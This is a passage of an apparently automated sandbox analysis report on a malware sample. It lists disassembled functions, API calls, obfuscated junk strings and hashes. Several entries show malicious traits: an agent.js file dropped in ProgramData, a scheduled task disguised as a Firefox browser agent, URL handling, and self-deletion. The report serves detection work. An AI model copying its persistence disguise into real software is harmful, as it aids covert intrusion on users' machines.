8, xrefs: 00FB2993

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: char_traits
String ID: &$8$9$jgjqrkqomrozhbdhmdxtwulfach$uqip
API String ID: 1158913984-1523665428
Opcode ID: b7d39a999acade2e6dac56e559430a8d1cbe65dd2fbcf27d3a29e73b08d737e4
Instruction ID: 2c64f31f68297ae930d5efd9e4f555e5d7ed2ec4b23aa99a9b57f70b62a0cbfd
Opcode Fuzzy Hash: b7d39a999acade2e6dac56e559430a8d1cbe65dd2fbcf27d3a29e73b08d737e4
Instruction Fuzzy Hash: F3415671D04249CADB54EFEAC9457EDBBB0FB04318F204229D016AB288DB795A49FF41

Uniqueness

Uniqueness Score: -1.00%

Function 00FB26F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

operator!=.LIBCPMTD ref: 00FB27B9
task.LIBCPMTD ref: 00FB27CA
task.LIBCPMTD ref: 00FB27D9

Strings

jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh, xrefs: 00FB276C
wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji, xrefs: 00FB2746, 00FB2781, 00FB279E

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh$wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji
API String ID: 2802545854-3928441437
Opcode ID: 1dded6ecd7722815c812eff8de148c10aecec1c88d6f80a9ca5367fe23376411
Instruction ID: c7bab2057360059a7d81ca699a93a8dc87ad0cd58d95796c996ea0bd9a674a80
Opcode Fuzzy Hash: 1dded6ecd7722815c812eff8de148c10aecec1c88d6f80a9ca5367fe23376411
Instruction Fuzzy Hash: B8418630D0428CCADB10EFA5CD56BEEBBB4AF15708F20825DD0057B285DB785A4AEF52

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2450 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

task.LIBCPMTD ref: 00FB24E6
task.LIBCPMTD ref: 00FB24F2
task.LIBCPMTD ref: 00FB24FE
task.LIBCPMTD ref: 00FB250A
task.LIBCPMTD ref: 00FB2519

Strings

dzydwibcsmroxflhizzvayjcy, xrefs: 00FB2482
fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm, xrefs: 00FB24CF
cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy, xrefs: 00FB24A0

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traits
String ID: cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy$dzydwibcsmroxflhizzvayjcy$fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm
API String ID: 1455298312-3639978120
Opcode ID: 30d7e993ede2ee6fd0b5752ea7a9aad119105d6ff6395590adc26ac9b18e8a52
Instruction ID: 3b9b5819120fd6474e09a77ad77338f22e1fa0a76990677e9ea5edc76ab9c844
Opcode Fuzzy Hash: 30d7e993ede2ee6fd0b5752ea7a9aad119105d6ff6395590adc26ac9b18e8a52
Instruction Fuzzy Hash: 09217831C44B8CDACB01EFA4CD26BEEBB74BF15B44F104258E4116B292EB791B45EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FB53DB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00FB54FA
___TypeMatch.LIBVCRUNTIME ref: 00FB5608
_UnwindNestedFrames.LIBCMT ref: 00FB575A
CallUnexpected.LIBVCRUNTIME ref: 00FB5775

Strings

csm, xrefs: 00FB5418
csm, xrefs: 00FB5485
csm, xrefs: 00FB5531

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 710fb71129eda341fc67438913af63485953aca62f30c201d64cd3104368a503
Instruction ID: 2e6c53c78e1844c2de40b0bf644a84655ed8ff8ebacb7e6b9c9de0d2718f448b
Opcode Fuzzy Hash: 710fb71129eda341fc67438913af63485953aca62f30c201d64cd3104368a503
Instruction Fuzzy Hash: A5B19D71D00A09DFCF24DFA6C981AEEBBB5FF04B21B144159E8016B212D739DA51EF91

Uniqueness

Uniqueness Score: -1.00%

Function 005A64D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 167memorynetworkCOMMON

Download Yara Rule

APIs

InternetCrackUrlW.WININET(005AA104,00000000,00000000,0000003C), ref: 005A6535
GetProcessHeap.KERNEL32(00000008,00000001,005AA104), ref: 005A6557
HeapAlloc.KERNEL32(00000000), ref: 005A655A
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 005A65C9
HeapAlloc.KERNEL32(00000000), ref: 005A65CC

Strings

<, xrefs: 005A64EB
(gZ, xrefs: 005A663B, 005A660B

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$AllocProcess$CrackInternet
String ID: (gZ$<
API String ID: 2637570027-785279525
Opcode ID: 382c6089edc744a79a851d26c79510e3a84bf72c58254c9a7a9da7383307ebca
Instruction ID: 8e1afeb90521675c1556d89c9ecfb72b1b589eca65d797b04f456af14b271c0e
Opcode Fuzzy Hash: 382c6089edc744a79a851d26c79510e3a84bf72c58254c9a7a9da7383307ebca
Instruction Fuzzy Hash: 8751BF74A0130A8FDB24CF68D484BAEBBB4FF5A304F2880ADD455DB642EB71D9068B50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4D50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00FB4D87
___except_validate_context_record.LIBVCRUNTIME ref: 00FB4D8F
_ValidateLocalCookies.LIBCMT ref: 00FB4E18
__IsNonwritableInCurrentImage.LIBCMT ref: 00FB4E43
_ValidateLocalCookies.LIBCMT ref: 00FB4E98

Strings

csm, xrefs: 00FB4E2D

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e1bb5926d2bdea1d9e9a06d091be0c366c81ef0e22fcd934fe9077982a50bf27
Instruction ID: 7f9d1902d157dcc59614c87b186649f8404218029644210d0b606079ab7102dc
Opcode Fuzzy Hash: e1bb5926d2bdea1d9e9a06d091be0c366c81ef0e22fcd934fe9077982a50bf27
Instruction Fuzzy Hash: 5E41AD34E002099BCF10EF6ACD81ADEBBA5BF49324F148059E8159B393C735E915EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FBA415 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00FBA46C
ext-ms-, xrefs: 00FBA480

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 05a01afc873c6dd89fe5049b40b651c81fa9d680ae2d2d1a3a8eb63ed288401a
Instruction ID: 207b6f051b82f31f354995d0e9ea402bef67dbc2716b7dd30ce1f0524f6419ad
Opcode Fuzzy Hash: 05a01afc873c6dd89fe5049b40b651c81fa9d680ae2d2d1a3a8eb63ed288401a
Instruction Fuzzy Hash: 2221DB32E41324EBDB31DB66DD49FEA36589B42770B200511ED0AB71E1E6B0DD00BDE2

Uniqueness

Uniqueness Score: -1.00%

Function 00FB219E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

operator!=.LIBCPMTD ref: 00FB2294
task.LIBCPMTD ref: 00FB22A5
task.LIBCPMTD ref: 00FB22B4

Strings

lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa, xrefs: 00FB21E5
oyr, xrefs: 00FB21F6
ianh, xrefs: 00FB21D1

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
API String ID: 2802545854-2962047866
Opcode ID: 26b0393c354cec47c24d3e6f4fd563483f1265cd2ab7c2f4a6a735921f27cb36
Instruction ID: c668b72f1da896dc7bb091f46d4e179aabd6d4ac995f63809a12a4ebe2e6095a
Opcode Fuzzy Hash: 26b0393c354cec47c24d3e6f4fd563483f1265cd2ab7c2f4a6a735921f27cb36
Instruction Fuzzy Hash: AE312B70D44658DAEB20EFA5CD52BDEBBB0AF04744F10419DE005B7282DB786B89EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9DCE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FB9D96: _free.LIBCMT ref: 00FB9DBB

_free.LIBCMT ref: 00FB9E1C

Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA

_free.LIBCMT ref: 00FB9E27
_free.LIBCMT ref: 00FB9E32
_free.LIBCMT ref: 00FB9E86
_free.LIBCMT ref: 00FB9E91
_free.LIBCMT ref: 00FB9E9C
_free.LIBCMT ref: 00FB9EA7

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
Instruction ID: 79f6eba5b63f688a5e9b5b4fcb5726e5628765c24bd9a3451c709b723740bb74
Opcode Fuzzy Hash: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
Instruction Fuzzy Hash: FA118131948B04AAD630BBB3CC07FDBB79D5F49700F804814B3D966152DABDB5456FA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A7220 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%ProgramData%,?,00000104), ref: 005A723A
PathCombineW.SHLWAPI(?,?,agent.js), ref: 005A7253

Part of subcall function 005A6AC0: VariantInit.OLEAUT32(?), ref: 005A6AD7
Part of subcall function 005A6AC0: CoCreateInstance.OLE32(005A1020,00000000,00000001,005A1000,?), ref: 005A6AF4
Part of subcall function 005A6AC0: SysAllocString.OLEAUT32(\Mozilla), ref: 005A6B34
Part of subcall function 005A6AC0: SysFreeString.OLEAUT32(?), ref: 005A6B6B
Part of subcall function 005A6AC0: SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6B78
Part of subcall function 005A6AC0: SysFreeString.OLEAUT32(00000000), ref: 005A6B8F

Part of subcall function 005A9020: GetFileAttributesW.KERNEL32(?,005A7269), ref: 005A9021

DeleteFileW.KERNEL32(?), ref: 005A7274
ExitProcess.KERNEL32 ref: 005A727C

Strings

agent.js, xrefs: 005A7240
%ProgramData%, xrefs: 005A7235

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: String$AllocFileFree$AttributesCombineCreateDeleteEnvironmentExitExpandInitInstancePathProcessStringsVariant
String ID: %ProgramData%$agent.js
API String ID: 1026123424-2175136953
Opcode ID: a98734bedd6e61e47adbd2fbbf2c43f43a423978717ac2e63901a00d968a2277
Instruction ID: 48edd20f91a3b410bfd0e902c88a9e02a196ca4308bfc873416e6a38d89f8a67
Opcode Fuzzy Hash: a98734bedd6e61e47adbd2fbbf2c43f43a423978717ac2e63901a00d968a2277
Instruction Fuzzy Hash: 97F0307550021C9BDB10EBA0DC4DBDE7B7CBB06301F0441A0B765920A2EBB05AC9CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FBBFF8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00FBC040
__fassign.LIBCMT ref: 00FBC225
__fassign.LIBCMT ref: 00FBC242
WriteFile.KERNEL32(?,00FBAD05,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FBC28A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FBC2CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FBC372

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: b9e51209788341144b915545fe5dfbe7f5a8d9ffc83865075b50555ad746131a
Instruction ID: 0488cab39119d8de557b3b4806ac3c9a9635cd93762780cbdaa848047cb119db
Opcode Fuzzy Hash: b9e51209788341144b915545fe5dfbe7f5a8d9ffc83865075b50555ad746131a
Instruction Fuzzy Hash: AFC19F75D042588FCF14CFE9C9809EEBBB5AF49314F28816AE855FB242D2319D42DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A8134 Relevance: 9.1, APIs: 6, Instructions: 81sleepstringthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 005A7DC6
lstrcmpA.KERNEL32(00000000,INIT), ref: 005A7DD3
StrToIntA.SHLWAPI(00000000), ref: 005A7E96
GetTickCount64.KERNEL32 ref: 005A829B

Part of subcall function 005A55E0: GetProcessHeap.KERNEL32(00000008,00000001,005A7E5E,00000001,00000000), ref: 005A55E3
Part of subcall function 005A55E0: HeapAlloc.KERNEL32(00000000), ref: 005A55EA

StrToIntA.SHLWAPI(00000000), ref: 005A8194
StrToIntA.SHLWAPI(?), ref: 005A819D
CreateThread.KERNEL32(00000000,00000000,Function_00007290,00000000,00000000,00000000), ref: 005A81B1
CloseHandle.KERNEL32(00000000), ref: 005A81BC

Part of subcall function 005A5600: GetProcessHeap.KERNEL32(00000000,00000000,005A82E5), ref: 005A5607
Part of subcall function 005A5600: HeapFree.KERNEL32(00000000), ref: 005A560E

Sleep.KERNEL32(00000000), ref: 005A82F6

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
String ID:
API String ID: 1253608127-0
Opcode ID: 35bf6b39b4bc331c765d80d00a0e527b3f0c1b729249b0d58964d4e8477f3ee0
Instruction ID: c88671c1d79a1792a61cef0b9fec11d061d23a68a25863b5f68ecd81f5ca4500
Opcode Fuzzy Hash: 35bf6b39b4bc331c765d80d00a0e527b3f0c1b729249b0d58964d4e8477f3ee0
Instruction Fuzzy Hash: 2F21E531E0060A97DB24ABB0DC5AB7F7F78BF86700F404429E912A7281EF3499048791

Uniqueness

Uniqueness Score: -1.00%

Function 00FB50A4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00FB509B,00FB4C89,00FB43FF), ref: 00FB50B2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FB50C0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FB50D9
SetLastError.KERNEL32(00000000,00FB509B,00FB4C89,00FB43FF), ref: 00FB512B

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e90f611f1c7a1873bd341bcf3aabc9d2566db4505c6de8633a764ce5594b54d4
Instruction ID: 928a8aab3c21a39c626e32d1fa6083c9acf987231a9f23598fa88b148d2c9471
Opcode Fuzzy Hash: e90f611f1c7a1873bd341bcf3aabc9d2566db4505c6de8633a764ce5594b54d4
Instruction Fuzzy Hash: 0E012833909B155DBF20377B6D87BD63A54EB15BB0B30022AF510820F1EE9D4C167D40

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

task.LIBCPMTD ref: 00FB1C63
task.LIBCPMTD ref: 00FB1C72

Strings

ggieqzszmbzlvilbxhiegdimtjzyfwhho, xrefs: 00FB1C08, 00FB1C20, 00FB1C3D
O, xrefs: 00FB1CA4

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traits
String ID: O$ggieqzszmbzlvilbxhiegdimtjzyfwhho
API String ID: 1455298312-2259853572
Opcode ID: 1834f5ff2e7b4ca5459608ee20fd20749887bd5cf89333e5ed9bf43be57f008a
Instruction ID: b0c5857cc3f5e13936d739adecf783c89edc8770267b27a125cbae7db5b427dc
Opcode Fuzzy Hash: 1834f5ff2e7b4ca5459608ee20fd20749887bd5cf89333e5ed9bf43be57f008a
Instruction Fuzzy Hash: 16415BB1D4420CDBCB14DFA9D9A5BEDBBB0FF04754F604119E412A7280DB78AA44EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1FF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

task.LIBCPMTD ref: 00FB204A
task.LIBCPMTD ref: 00FB2056
task.LIBCPMTD ref: 00FB2065

Strings

* , xrefs: 00FB2022
zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads, xrefs: 00FB2029

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traits
String ID: * $zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads
API String ID: 1455298312-2972419988
Opcode ID: 13144cb22c7f088a5a6788d5d97b0e1590ec51d33d77da933f4e101960e0237b
Instruction ID: a27d74809f980cd8ceaccfbf5b008f2261f06e8785172db90842b9c5834a2cfd
Opcode Fuzzy Hash: 13144cb22c7f088a5a6788d5d97b0e1590ec51d33d77da933f4e101960e0237b
Instruction Fuzzy Hash: 25115B7194464CDACB04EFA4DD55BEDFBB4EF08714F108219E821672D1EF395609DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB7627 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00FB75D9,?,?,00FB75A1,?,?,?), ref: 00FB763C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FB764F
FreeLibrary.KERNEL32(00000000,?,?,00FB75D9,?,?,00FB75A1,?,?,?), ref: 00FB7672

Strings

mscoree.dll, xrefs: 00FB7635
CorExitProcess, xrefs: 00FB7647

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bb1e2ae48ae925fef16319945a4100053455ef16fc1813f3a155f822b43b1a6f
Instruction ID: 9c456bf619d1c3b9acbdd22ab7c529ccd00dec6146102a77e8500f4200ca76bc
Opcode Fuzzy Hash: bb1e2ae48ae925fef16319945a4100053455ef16fc1813f3a155f822b43b1a6f
Instruction Fuzzy Hash: B7F05E31941719BBCB11AB55DE0AFDE7B79FB41796F000154E901A21A1CB70CE10FE95

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9D2D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FB9D45

